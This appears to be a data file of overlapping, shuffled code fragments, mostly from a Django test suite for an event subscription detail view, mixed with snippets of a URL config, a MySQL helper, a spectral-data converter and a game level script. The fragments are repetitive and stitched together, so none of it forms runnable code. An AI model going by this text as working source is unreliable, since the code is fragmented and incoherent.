[ "import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class", "django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription", "uuid from django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models", "= self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone", "self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase):", "Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200,", "def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def test_not_found(self): self.assertEqual(404, self.response.status_code)", "test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents:", "self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription =", "resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj =", "self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents =", "content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = 
self.client.get(r('subscriptions:detail', uid)) def", "subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email,", "self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription)", "TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase):", "self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone )", "in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4()", "django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self):", "self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def", "SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def test_not_found(self): self.assertEqual(404,", "from django.shortcuts import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def", "from django.test import TestCase from django.shortcuts import resolve_url as r from eventex.subscriptions.models import", "self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, 
self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription", "test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents", "test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf,", "setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid))", "self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid))", "= Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self):", "Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' )", "self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def", ") self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html')", "( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): 
self.assertContains(self.response,", "= ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest():", "def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail',", "contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response", "with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response =", "self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def", "import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321'", "name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code)", "def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name,", "test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription,", "self.assertIsInstance(subscription, Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for", "self.obj.cpf, 
self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content) class", "self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def", "class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail', uid)) def test_not_found(self):", "= self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self):", "phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response,", "for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid", ") for content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self):", "'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self): contents = (", "r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>',", "eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>',", "from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = 
Subscription.objects.create( name='<NAME>', cpf='12345678901',", "import resolve_url as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj", "SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response =", "cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def", "contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with", "self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in contents: with self.subTest(): self.assertContains(self.response, content)", "def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content in", "self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid = uuid.uuid4() self.response = self.client.get(r('subscriptions:detail',", "email='<EMAIL>', phone='938654321' ) self.response = self.client.get(r('subscriptions:detail', self.obj.uid)) def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self):", "import uuid from django.test import TestCase from django.shortcuts import resolve_url as r from", "class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create( name='<NAME>', cpf='12345678901', email='<EMAIL>', phone='938654321' ) self.response", "as r from eventex.subscriptions.models import Subscription class SubscriptionDetailGet(TestCase): def setUp(self): self.obj = Subscription.objects.create(", "def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = 
self.response.context['subscription'] self.assertIsInstance(subscription, Subscription) def test_html(self):", "def test_get(self): self.assertEqual(200, self.response.status_code) def test_template_used(self): self.assertTemplateUsed(self.response, 'subscriptions/subscription_detail.html') def test_context(self): subscription = self.response.context['subscription']", "content in contents: with self.subTest(): self.assertContains(self.response, content) class SubscriptionDetailNotFound(TestCase): def setUp(self): uid =", "Subscription) def test_html(self): contents = ( self.obj.name, self.obj.cpf, self.obj.email, self.obj.phone ) for content" ]
[ "0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1,", "{ \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0,", "receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = {", "from enum import Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2,", "import Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes", "1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1, \"COMPLETED\": 2", "\"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\":", "= { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\":", "\"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1, \"COMPLETED\":", "\"DISCONNECT\": 2, } handshake_codes = { \"UNKNOWN\": 0, \"WAITING_ACK\": 1, \"COMPLETED\": 2 }", "enum import Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, }", "Enum receive_codes = { \"PING\": 0, \"HANDSHAKE\": 1, \"DISCONNECT\": 2, } handshake_codes =" ]
[ "import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment),", "import path from . import views urlpatterns = [ path('', views.index), path('expand', views.expand),", "views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment), path('public_data',", "from django.urls import path from . import views urlpatterns = [ path('', views.index),", "path from . import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload',", "from . import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload),", "= [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment), path('public_data', views.get_public_data), ]", ". import views urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment',", "urlpatterns = [ path('', views.index), path('expand', views.expand), path('upload', views.upload), path('comment', views.add_comment), path('public_data', views.get_public_data),", "django.urls import path from . import views urlpatterns = [ path('', views.index), path('expand'," ]
[ "and output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input)", "an input and output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile", "# -*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys", "len(sys.argv) != 3: print(\"Not enough arguments given. Need an input and output file\")", "for i in range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1,", "= sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in", "sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1,", "output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i", "'__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need an input and", "Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as pr", "with open(output, 'wb') as f: for i in range(1, inputFile.height): for j in", "j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1, pr.Spectrum.SAMPLING_COUNT):", "as pr # Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not", "import sys import struct import pypearray as pr # Main if __name__ ==", "== '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need an input", "<gh_stars>10-100 #!/usr/bin/python # -*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT", "import pypearray as pr # Main if __name__ == '__main__': if len(sys.argv) !=", "print(\"Not enough arguments given. 
Need an input and output file\") exit() input =", "file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output,", "sys import struct import pypearray as pr # Main if __name__ == '__main__':", "for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1,", "struct import pypearray as pr # Main if __name__ == '__main__': if len(sys.argv)", "given. Need an input and output file\") exit() input = sys.argv[1] output =", "inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1, inputFile.height):", "pr # Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough", "pypearray as pr # Main if __name__ == '__main__': if len(sys.argv) != 3:", "__name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. Need an", "exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb')", "if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given. 
Need", "open(output, 'wb') as f: for i in range(1, inputFile.height): for j in range(1,", "# Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments", "as f: for i in range(1, inputFile.height): for j in range(1, inputFile.width): spec", "# pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as pr #", "OUTPUT import sys import struct import pypearray as pr # Main if __name__", "utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import", "inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in", "# Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as", "input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as", "-*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray", "Need an input and output file\") exit() input = sys.argv[1] output = sys.argv[2]", "range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1, pr.Spectrum.SAMPLING_COUNT): f.write(struct.pack(\"!f\", spec[k-1]))", "input and output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile =", "!= 3: print(\"Not enough arguments given. Need an input and output file\") exit()", "range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k", "output file\") exit() input = sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with", "-*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import", "coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import sys import struct", "3: print(\"Not enough arguments given. Need an input and output file\") exit() input", "f: for i in range(1, inputFile.height): for j in range(1, inputFile.width): spec =", "i in range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1]", "arguments given. 
Need an input and output file\") exit() input = sys.argv[1] output", "enough arguments given. Need an input and output file\") exit() input = sys.argv[1]", "pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1, inputFile.height): for j", "INPUT OUTPUT import sys import struct import pypearray as pr # Main if", "in range(1, inputFile.width): spec = inputFile[i-1, j-1] for k in range(1, pr.Spectrum.SAMPLING_COUNT): f.write(struct.pack(\"!f\",", "#!/usr/bin/python # -*- coding: utf-8 -*- # Use: # pr_spec2xyz INPUT OUTPUT import", "pr_spec2xyz INPUT OUTPUT import sys import struct import pypearray as pr # Main", "import struct import pypearray as pr # Main if __name__ == '__main__': if", "= sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f:", "if len(sys.argv) != 3: print(\"Not enough arguments given. Need an input and output", "Main if __name__ == '__main__': if len(sys.argv) != 3: print(\"Not enough arguments given.", "= pr.SpectralFile.open(input) with open(output, 'wb') as f: for i in range(1, inputFile.height): for", "in range(1, inputFile.height): for j in range(1, inputFile.width): spec = inputFile[i-1, j-1] for", "'wb') as f: for i in range(1, inputFile.height): for j in range(1, inputFile.width):", "sys.argv[1] output = sys.argv[2] inputFile = pr.SpectralFile.open(input) with open(output, 'wb') as f: for" ]
[ "antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor()", "return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close()", "def antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content: return", "res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text)", "if antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur =", "content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall()", "conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur =", "1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit()", "cur.close() conn.commit() conn.close() return res def sql_write(text): 
conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) cur.close()", "0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return", "MySQLdb def antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content:", "in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text)", "conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) cur.close() conn.commit() conn.close()", "antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content: return 1", "(len(antistr)): if antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur", "antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in content: return 1 return", "conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) cur.close() conn.commit()", 
"conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text):", "range (len(antistr)): if antistr[i] in content: return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8')", "i in range (len(antistr)): if antistr[i] in content: return 1 return 0 def", "cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8')", "for i in range (len(antistr)): if antistr[i] in content: return 1 return 0", "= conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur", "in range (len(antistr)): if antistr[i] in content: return 1 return 0 def sql_select(text):", "import MySQLdb def antisql(content): antistr=u\"'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|;|or|-|+|,\".split(u\"|\") for i in range (len(antistr)): if antistr[i] in", "cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def sql_write(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor()", "return 1 return 0 def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close()", "sql_select(text): 
conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res def", "def sql_select(text): conn=MySQLdb.connect(host='localhost',user=\"root\",passwd=\"<PASSWORD>\",db=\"dimcreator\",port=3306,charset='utf8') cur = conn.cursor() cur.execute(text) res=cur.fetchall() cur.close() conn.commit() conn.close() return res" ]
[ "( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove the", "\"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the exit,\\nmove", "i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i),", "(1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)])", "\"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s = world.getSize()", "1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for", "1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1,", "i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i,", "<NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\":", "(KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, i, 0)) world.addObjectAtPos (KikiStone(), world.decenter(0, 0,", "# ................................................................................................................. # Level design of 'captured' by <NAME> # ................................................................................................................. 
level_dict[\"captured\"] =", "(KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1,", "1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone,", "s = world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1,", "[world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1,", "(i, 1, 1), world.decenter(i, 1, -1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)])", "{ \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\"", "+ \\ \"to get to the exit,\\nmove the stones\", ), \"player\": { \"position\":", "design of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\":", "the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ { \"name\": \"exit\",", "world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter", "get to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\":", "i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1), world.decenter(i, 1,", "\"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to", "[ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s", "for i in [-4, -2, 2, 4]: world.addObjectAtPos (KikiStone(), world.decenter(i, 0, 0)) world.addObjectAtPos", "i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i,", "in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter", "\\ 
\"to get to the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0),", "i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i,", "= { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the", "-1),\\ world.decenter (i, -1, -1), world.decenter(i, -1, 1)]) for i in [-4, -2,", "of 'captured' by <NAME> # ................................................................................................................. level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9),", "the exit,\\nmove the stones\", ), \"player\": { \"position\": (0,-3,0), }, \"exits\": [ {", "= world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i),", "[-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1, -1, i), world.decenter (-1,", "\"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to the exit!\\n\\n\" + \\ \"to get to the", "{ \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\" s =", "world.decenter (-1, i, -1), world.decenter(-1, i, 1)]) world.addObjectPoly (KikiStone, [world.decenter (i, 1, 1),", "level_dict[\"captured\"] = { \"scheme\": \"default_scheme\", \"size\": (9,9,9), \"intro\": \"captured\", \"help\": ( \"$scale(1.5)mission:\\nget to", "(KikiStone, [world.decenter (1, i, 1), world.decenter(1, i, -1),\\ world.decenter (-1, i, -1), world.decenter(-1,", "world.getSize() for i in [-2, 2]: world.addObjectPoly (KikiStone, [world.decenter (1, 1, i), world.decenter(1,", "\"exits\": [ { \"name\": \"exit\", \"active\": 1, \"position\": (0,0,0), }, ], \"create\": \"\"\"", "(-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone, [world.decenter (1, i, 1), world.decenter(1,", "i), world.decenter(1, -1, i), world.decenter (-1, -1, i), world.decenter(-1, 1, i)]) world.addObjectPoly (KikiStone,", "}, \"exits\": [ { 
